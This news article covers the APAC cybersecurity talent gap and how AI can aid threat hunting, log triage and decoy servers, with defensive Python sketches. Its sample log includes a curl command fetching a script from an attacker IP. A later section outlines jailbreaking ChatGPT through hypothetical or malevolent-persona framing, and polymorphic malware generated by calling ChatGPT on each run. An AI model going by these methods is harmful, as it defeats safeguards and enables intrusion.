In an era marked by increasing digitalization and rampant cyberthreats, the Asia-Pacific (APAC) region faces a critical challenge: a significant shortage in cybersecurity talent. Coupled with the rapid advancement of malicious techniques, there is an urgent need for innovative solutions to bolster cyber-defenses.
As of 2022, APAC had a shortfall of 2.1 million cybersecurity professionals. A Kaspersky specialist has explored in depth how cybersecurity teams can leverage Artificial Intelligence (AI) to strengthen their existing protective measures against the region's rapidly evolving cyberthreats.
Saurabh Sharma, senior security researcher with Kaspersky's Global Research and Analysis Team (GReAT) in Asia-Pacific, indicated that while cybercriminals may harness AI for nefarious purposes, cybersecurity teams can employ the same technology for defensive ends.
AI and cybersecurity in APAC’s digital economy
In 2022, the APAC region faced a 52.4% shortfall in cybersecurity talent, a critical issue as the region advances its digital economy. Singapore's cybersecurity workforce declined 16.5% to 77,425, making it one of only two markets where the workforce shrank.
The worldwide gap in cybersecurity talent increased by 26.2% to reach 3.42 million. The Asia-Pacific had the largest shortage, followed by Latin America with a deficit of 515,879 professionals and North America, which needs 436,080 more.
In the Asia-Pacific, 60% of survey participants acknowledged a substantial lack of cybersecurity staff in their organizations. Moreover, 56% said that this talent gap exposed their companies to moderate or high risks of cyberattacks.
The urgent need for AI in cybersecurity
“This urgent need can drive IT security teams to look into using smart machines in augmenting their organizations’ cyber defenses, and AI can help in key areas like threat intelligence, incident response, and threat analysis,” said Sharma.
Threat intelligence in cybersecurity encompasses automating and enhancing the many procedures for collecting, analyzing, and sharing information on threats. These include:
- Threat hunting: AI can help actively identify threats that are not yet common knowledge, enabling cybersecurity professionals to unearth new attack methods or weaknesses by analyzing unusual behavior.
- Malware analysis: AI-powered tools can automatically analyze malware samples, identifying their behavior, capabilities, and likely impact. This makes it easier to understand a sample's purpose and choose the best mitigation strategy.
- Real-time threat detection: AI-based security solutions can monitor network traffic, activity logs, and overall system behavior in real time, detecting abnormal or suspicious activity that could signal an ongoing cyberattack (a minimal sketch of this idea follows the list).
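To make the real-time detection idea concrete, here is a minimal sketch using scikit-learn's IsolationForest, an unsupervised anomaly detector. The feature set (outbound bytes, packet count, session duration) and all the numbers are illustrative assumptions, not anything from the article; a real deployment would train on far richer telemetry.

```python
# Minimal sketch: flagging anomalous network flows with an unsupervised model.
# Features per flow: [bytes_out, packets, duration_s] -- a hypothetical choice.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(seed=42)

# Simulated "normal" flows: modest traffic volumes and durations.
normal = rng.normal(loc=[5_000, 40, 30], scale=[1_500, 10, 8], size=(500, 3))
# Two simulated exfiltration-like flows: large outbound volume, long sessions.
suspect = np.array([[250_000.0, 900.0, 600.0], [180_000.0, 700.0, 420.0]])

model = IsolationForest(contamination=0.01, random_state=0)
model.fit(normal)

# predict() returns -1 for outliers, 1 for inliers.
for flow, label in zip(suspect, model.predict(suspect)):
    status = "ANOMALOUS" if label == -1 else "normal"
    print(f"bytes_out={flow[0]:.0f} packets={flow[1]:.0f} "
          f"duration_s={flow[2]:.0f} -> {status}")
```

The design point is that the model learns only what "normal" looks like, so it can flag behavior it has never seen before, which is exactly the property threat hunters rely on.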
Sharma indicated that AI algorithms can rapidly sift through and evaluate past research and historical tactics, techniques, and procedures (TTPs) to help formulate threat-hunting hypotheses.
Kaspersky's expert further noted that in cyber-incident response, AI can point out irregularities in provided logs, interpret a specific security event log, hypothesize how a given security event might appear in the logs, and offer guidance on locating initial points of compromise, such as web shells.
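As one illustration of the log-triage step Sharma describes, the sketch below hands a short auth-log excerpt to an LLM via the OpenAI Python SDK and asks it to point out irregularities. The model name, prompt wording, and log contents are all assumptions for demonstration; a real workflow would also redact sensitive fields before sending anything to an external API.

```python
# Minimal sketch: asking an LLM to flag irregularities in a security event log.
# Assumes OPENAI_API_KEY is set in the environment; the model name is illustrative.
from openai import OpenAI

client = OpenAI()

log_excerpt = """\
2023-06-01T02:14:07Z sshd[811]: Failed password for root from 203.0.113.9
2023-06-01T02:14:09Z sshd[811]: Failed password for root from 203.0.113.9
2023-06-01T02:14:12Z sshd[811]: Accepted password for root from 203.0.113.9
2023-06-01T02:15:30Z sudo: root : COMMAND=/usr/bin/curl http://203.0.113.9/x.sh
"""

response = client.chat.completions.create(
    model="gpt-4o-mini",
    messages=[
        {"role": "system",
         "content": "You are a security analyst. Point out irregularities in "
                    "this log and suggest where the initial point of compromise "
                    "(e.g. a brute-forced account or web shell) may lie."},
        {"role": "user", "content": log_excerpt},
    ],
)
print(response.choices[0].message.content)
```

The value here is speed of first-pass triage: the analyst still verifies every finding, but the model can surface the failed-then-accepted login pattern and the suspicious download in seconds.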
Regarding threat analysis, the phase where cybersecurity professionals delve into the workings of the tools employed in an attack, Sharma observed that technologies like ChatGPT can even aid in pinpointing key elements of malware, deciphering obfuscated scripts, and setting up decoy web servers with specific encryption methods (a sketch of such a decoy follows).
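In the spirit of the decoy servers mentioned above, here is a minimal honeypot-style web server served over TLS, built only from the Python standard library. The port, certificate paths, and response body are assumptions; a self-signed pair can be generated first with, for example, `openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 30 -nodes`.

```python
# Minimal sketch: a TLS-wrapped decoy web server that logs every probe.
import http.server
import ssl

class DecoyHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Record who is probing and what they ask for, then serve a bland page
        # to keep automated scanners engaged.
        print(f"[decoy] {self.client_address[0]} requested {self.path}")
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<html><body>It works!</body></html>")

server = http.server.HTTPServer(("0.0.0.0", 8443), DecoyHandler)

# Wrap the listening socket in TLS using the assumed cert/key pair.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="cert.pem", keyfile="key.pem")
server.socket = context.wrap_socket(server.socket, server_side=True)

server.serve_forever()
```

Everything the decoy logs is attacker-supplied data at no risk to production systems, which is what makes such servers useful during threat analysis.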
The double-edged sword: ChatGPT and prompt engineering
How can all this be achieved? As CSO Online reports, recent experiments have demonstrated that seemingly harmless executable files can be engineered, upon each execution, to initiate an API call to ChatGPT. Instead of merely replicating pre-existing code samples, ChatGPT can be instructed to create fluctuating, evolving versions of malevolent code with each call, complicating the task of detection for cybersecurity mechanisms.
ChatGPT, like other Large Language Models (LLMs), comes equipped with content filters designed to prevent it from complying with requests to create detrimental content like malicious code. However, these content filters aren't foolproof and can be circumvented.
Nearly all known potential exploits involving ChatGPT are carried out using a technique now referred to as “prompt engineering.” This involves altering the input prompts to evade the built-in content filters of the tool, thereby obtaining the intended output.
Early users discovered they could essentially “jailbreak” ChatGPT by framing queries as hypothetical situations. For instance, by asking the program to perform actions as though it were not an AI but a malevolent individual, they were able to get it to produce unauthorized content.
Deceiving ChatGPT into drawing on internal knowledge that its filters would otherwise restrict lets users coax it into creating potent malicious code. Attackers can further optimize this to produce polymorphic code by exploiting the model's tendency to vary and refine its output when the same prompt is run multiple times.
Nonetheless, Sharma pointed out the boundaries of AI in constructing and sustaining cybersecurity measures. He advised APAC businesses and organizations to:
- Prioritize enhancing current teams and processes.
- Ensure that transparency is integral to the deployment and usage of Generative AI, particularly given that these models can produce incorrect data.
- Keep a comprehensive record of all engagements with Generative AI, make it accessible for scrutiny, and preserve it throughout the lifespan of any products integrated into corporate systems.
In conclusion, Sharma said, “AI has clear benefits for cybersecurity teams, especially in automating data collection, improving Mean Time to Resolution (MTTR), and limiting the impact of any incidents. If utilized effectively, this technology can also reduce skill requirements for security analysts. But organizations should remember that smart machines can augment and supplement human talent, but not replace it.”
Source: techwireasia.com